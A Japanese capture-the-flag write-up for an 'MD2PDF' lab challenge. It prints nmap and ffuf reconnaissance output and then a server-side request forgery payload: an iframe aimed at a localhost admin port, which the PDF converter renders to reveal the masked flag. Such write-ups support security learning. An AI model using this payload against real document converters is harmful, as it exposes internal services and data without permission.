MD2PDF - writeup
Task1:Challenge
Q.What is the flag?
nmapをしてみます。
$ nmap -Pn -sC -sV -A -T4 -oN nmap_result 10.48.147.63
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-24 00:32 -0500
WARNING: Service 10.48.147.63:5000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
WARNING: Service 10.48.147.63:80 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.48.147.63
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f5:42:7e:05:14:49:7a:69:e2:e2:bc:02:32:bc:bd:3e (RSA)
| 256 cd:a9:f9:bf:04:a6:9a:7a:fb:db:fc:e2:81:d9:92:da (ECDSA)
|_ 256 63:64:21:54:d6:6a:8c:13:3d:61:ab:1f:f6:3d:71:0d (ED25519)
80/tcp open rtsp
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
|_http-title: MD2PDF
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Content-Length: 2660
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <meta
| name="viewport"
| content="width=device-width, initial-scale=1, shrink-to-fit=no"
| <link
| rel="stylesheet"
| href="./static/codemirror.min.css"/>
| <link
| rel="stylesheet"
| href="./static/bootstrap.min.css"/>
| <title>MD2PDF</title>
| </head>
| <body>
| <!-- Navigation -->
| <nav class="navbar navbar-expand-md navbar-dark bg-dark">
| <div class="container">
| class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
| </div>
| </nav>
| <!-- Page Content -->
| <div class="container">
| <div class="">
| <div class="card mt-4">
| <textarea class="form-control" name="md" id="md"></textarea>
| </div>
| <div class="mt-3
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, OPTIONS, GET
| Content-Length: 0
| RTSPRequest:
| RTSP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, OPTIONS, GET
|_ Content-Length: 0
5000/tcp open rtsp
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Content-Length: 2624
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <meta
| name="viewport"
| content="width=device-width, initial-scale=1, shrink-to-fit=no"
| <link
| rel="stylesheet"
| href="./assets/codemirror.min.css"/>
| <link
| rel="stylesheet"
| href="./assets/bootstrap.min.css"/>
| <title>MD2PDF</title>
| </head>
| <body>
| <!-- Navigation -->
| <nav class="navbar navbar-expand-md navbar-dark bg-dark">
| <div class="container">
| class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
| </div>
| </nav>
| <!-- Page Content -->
| <div class="container">
| <div class="">
| <div class="card mt-4">
| <textarea class="form-control" name="md" id="md"></textarea>
| </div>
| <div class="mt-3
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
| Content-Length: 0
| RTSPRequest:
| RTSP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
|_ Content-Length: 0ポート80と5000はrtsp(Real Time Streaming Protocol)と出ましたが、なぜかhtmlが表示されていてhttpでアクセスができています。両方のポートでブラウザからアクセスできました。
MarkDownからpdfに変換するソフトのようです。
ffufでディレクトリを探すと/adminがありました
ffuf -w /usr/share/wordlists/dirb/common.txt -o ffufrezult.html -of html -e .php,.txt,.zip,.bak -recursion -recursion-depth 1 -v -t 80 -u http://10.48.147.63/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.48.147.63/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .php .txt .zip .bak
:: Output file : ffufrezult.html
:: File format : html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 80
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 2660, Words: 739, Lines: 102, Duration: 143ms]
| URL | http://10.48.147.63/
* FUZZ:
[Status: 403, Size: 166, Words: 15, Lines: 5, Duration: 136ms]
| URL | http://10.48.147.63/admin
* FUZZ: admin403はアクセス権限がないときに表示されます。
webで下のhtmlを入れConvert to PDFを押します。
<iframe src="http://127.0.0.1:5000/admin"></iframe>iframeとは別のwebページを埋め込むための窓を作るタグです。
flagが入手できました。
A.flag{********************}
疑問
タグで指定するポートを80にして実行すると400 Bad Requestになります。80番ポートのほうはセキュリティが固く、5000番のほうは通常はアクセスしないためゆるくなっているのだと推測しました。